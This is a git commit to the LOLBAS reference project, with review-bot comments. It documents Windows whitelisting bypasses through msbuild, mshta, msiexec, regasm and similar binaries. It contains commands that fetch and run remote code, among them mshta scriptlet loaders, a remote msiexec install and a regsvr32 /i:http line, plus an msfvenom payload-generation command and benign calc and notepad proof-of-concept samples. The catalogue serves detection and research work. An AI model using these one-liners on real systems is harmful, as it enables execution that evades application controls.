Added some more adjustments

master
api0cradle 2018-04-18 23:12:38 +02:00
parent ddc1173e45
commit 1a0eb4edc7
9 changed files with 243 additions and 10 deletions

View File

@ -4,10 +4,37 @@
``` ```
msbuild.exe pshell.xml msbuild.exe pshell.xml
msbuild.exe Msbuild.csproj
``` ```
Acknowledgements: Acknowledgements:
* Casey Smith - @subtee * Casey Smith - @subtee
* Cn33liz - @Cneelis
Code sample:
* [Msbuild.csproj](Payload/Msbuild.csproj)
Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
* https://github.com/Cn33liz/MSBuildShell
* https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Full path:
```
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
```
Notes:
Example code borrowed from Red Canary - Atomic Red Team.
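Review bot: The "Full path" block lists the v2.0.50727 and v3.5 copies of Msbuild.exe, but the linked sample declares ToolsVersion="4.0" and loads CodeTaskFactory from Microsoft.Build.Tasks.v4.0.dll, so only the v4.0.30319 paths will actually run it; either note that the inline-task sample needs the 4.0 toolset or trim the list to the paths that apply. Also, the first usage line still refers to pshell.xml, which is not linked under "Code sample", while the new Msbuild.csproj is; link both or drop the unreferenced one so readers and detection engineers know which artifact the entry documents.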

View File

@ -9,7 +9,19 @@ Open .diagcab package
Acknowledgements: Acknowledgements:
* ? * ?
Code sample:
* [NameOfLink](Payload/NameOfPayload)
Resources: Resources:
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Full path:
```
C:\Windows\System32\Msdt.exe
C:\Windows\SysWOW64\Msdt.exe
```
Notes:
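Review bot: The "Code sample" line is the untouched template placeholder `* [NameOfLink](Payload/NameOfPayload)`, which renders as a dead link; replace it with a real sample or remove the section, as was done for entries without a sample. The acknowledgement is still `?` and "Notes:" is empty, so this entry ships with three unfilled fields.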

View File

@ -4,7 +4,30 @@
``` ```
mshta.exe evilfile.hta mshta.exe evilfile.hta
mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
``` ```
Acknowledgements: Acknowledgements:
* ? * Casey Smith - @subtee
Code sample:
* [Mshta_calc.sct](Payload/Mshta_calc.sct)
Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Full path:
```
C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe
```
Notes:
SCT code borrowed from Red Canary - Atomic Red Team
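Review bot: The two usage lines use different URL conventions: the vbscript example defangs its URL (`https[:]//webserver/payload[.]sct`) while the javascript example below it carries a live raw.githubusercontent.com URL; pick one convention for the file so the entry is consistent and copy-paste behaviour is predictable. The acknowledgement changes from `?` to Casey Smith while the note credits Red Canary for the SCT, so it is worth stating in "Notes:" which part each credit covers.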

View File

@ -8,4 +8,25 @@ msiexec /q /i http://192.168.100.3/tmp/cmd.png
``` ```
Acknowledgements: Acknowledgements:
* Casey Smith - @subtee * ? - @netbiosX
Code sample:
*
Resources:
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
Full path:
```
c:\windows\system32\msiexec.exe
c:\windows\sysWOW64\msiexec.exe
```
Notes:
Generate MSI file:
```
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
```
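Review bot: The acknowledgement replaces "Casey Smith - @subtee" with "? - @netbiosX" rather than adding a second entry, unlike the Msbuild change in this commit which appends; confirm the removal is intended and fill in the name next to the handle or drop the `?`. The "Code sample" section has an empty bullet (`*`), so either link the generated MSI's source or remove the bullet. The paths use lowercase `c:\windows` while the Msbuild and Mshta entries use `C:\Windows`; the file would read better with one casing.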

View File

@ -9,3 +9,21 @@ odbcconf -f file.rsp
Acknowledgements: Acknowledgements:
* Casey Smith - @subtee * Casey Smith - @subtee
* Nick Tyrer - @NickTyrer * Nick Tyrer - @NickTyrer
Code sample:
*
Resources:
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
* https://github.com/woanware/application-restriction-bypasses
Full path:
```
c:\windows\system32\odbcconf.exe
c:\windows\sysWOW64\odbcconf.exe
```
Notes:
Samples can be found in the resources.
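Review bot: "Code sample" is left as an empty bullet (`*`) while "Notes:" says samples are in the resources; either point the bullet at the gist already listed under "Resources" or remove the empty bullet so the section is not misleading. The paths here are lowercase (`c:\windows\system32`) whereas other entries in this commit use `C:\Windows`; worth unifying.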

View File

@ -0,0 +1,47 @@
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->
<!-- Feel free to use a more aggressive class for testing. -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From a Code Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<!-- <Reference Include="System.IO" /> Example Include -->
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
Console.WriteLine("Hello From a Class.");
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
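Review bot: The comment on line 3 gives the invocation as `msbuild.exe MSBuildBypass.csproj`, but this file is added as Payload/Msbuild.csproj and Msbuild.md invokes `msbuild.exe Msbuild.csproj`; update the comment to the real file name. Both UsingTask elements hard-code `AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"`; the usual form `AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll"` resolves under both the Framework and Framework64 paths listed in Msbuild.md. `public class ClassExample : Task, ITask` is redundant since Task already implements ITask; `: Task` alone is enough.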

View File

@ -0,0 +1,43 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
<!-- DFIR -->
<!-- .sct files are downloaded and executed from a path like this -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
}
]]>
</script>
</scriptlet>
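Review bot: The comment opened at `<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll` has no closing `-->`, so it runs into the next line and the `<!-- DFIR -->` comment ends up nested inside it with a `--` sequence, which is not well-formed XML; add the missing `-->`. That comment block also describes a regsvr32 invocation, but this file is linked from Mshta.md and invoked via `.Exec()`; the registration script runs calc.exe while `Exec()` runs notepad.exe, so the file name Mshta_calc.sct does not match what the documented invocation launches. Either make both paths launch the same program or note the difference in Mshta.md. "arbitary" in the DFIR comment should be "arbitrary".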

View File

@ -8,3 +8,24 @@ Presentationhost.exe C:\temp\Evil.xbap
Acknowledgements: Acknowledgements:
* Casey Smith - @subtee * Casey Smith - @subtee
Code sample:
*
Resources:
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Full path:
```
c:\windows\system32\PresentationHost.exe
c:\windows\sysWOW64\PresentationHost.exe
```
Notes:
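Review bot: The usage line refers to `C:\temp\Evil.xbap` but "Code sample" is an empty bullet (`*`) and "Notes:" is empty; either link a sample XBAP or remove the empty bullet and blank section, as the placeholder fields give readers nothing to verify. Paths are lowercase (`c:\windows\system32`) unlike the `C:\Windows` casing used elsewhere in this commit.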

View File

@ -3,10 +3,31 @@
* Functions: Execute * Functions: Execute
``` ```
regasm.exe /U regsvcs.dll regasm.exe /U AllTheThings.dll
regasm.exe regsvcs.dll
``` ```
Acknowledgements: Acknowledgements:
* Casey Smith - @subtee * Casey Smith - @subtee
Code sample:
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Full path:
```
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
```
Notes:
[1]Code sample linked to Red Canary - Atomic Red Team
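Review bot: The first usage line was changed to `regasm.exe /U AllTheThings.dll` but the added second line still reads `regasm.exe regsvcs.dll`, so the two examples reference different assemblies; use one name for both or explain why they differ. The "Code sample" links to a prebuilt x64 binary in another repository while the corresponding source (RegSvcsRegAsmBypass.cs) is only listed under "Resources"; linking the source as the sample, or alongside the DLL, lets reviewers and defenders read what the artifact does instead of trusting a compiled file. The footnote `[1]Code sample linked to ...` is missing a space after `[1]`.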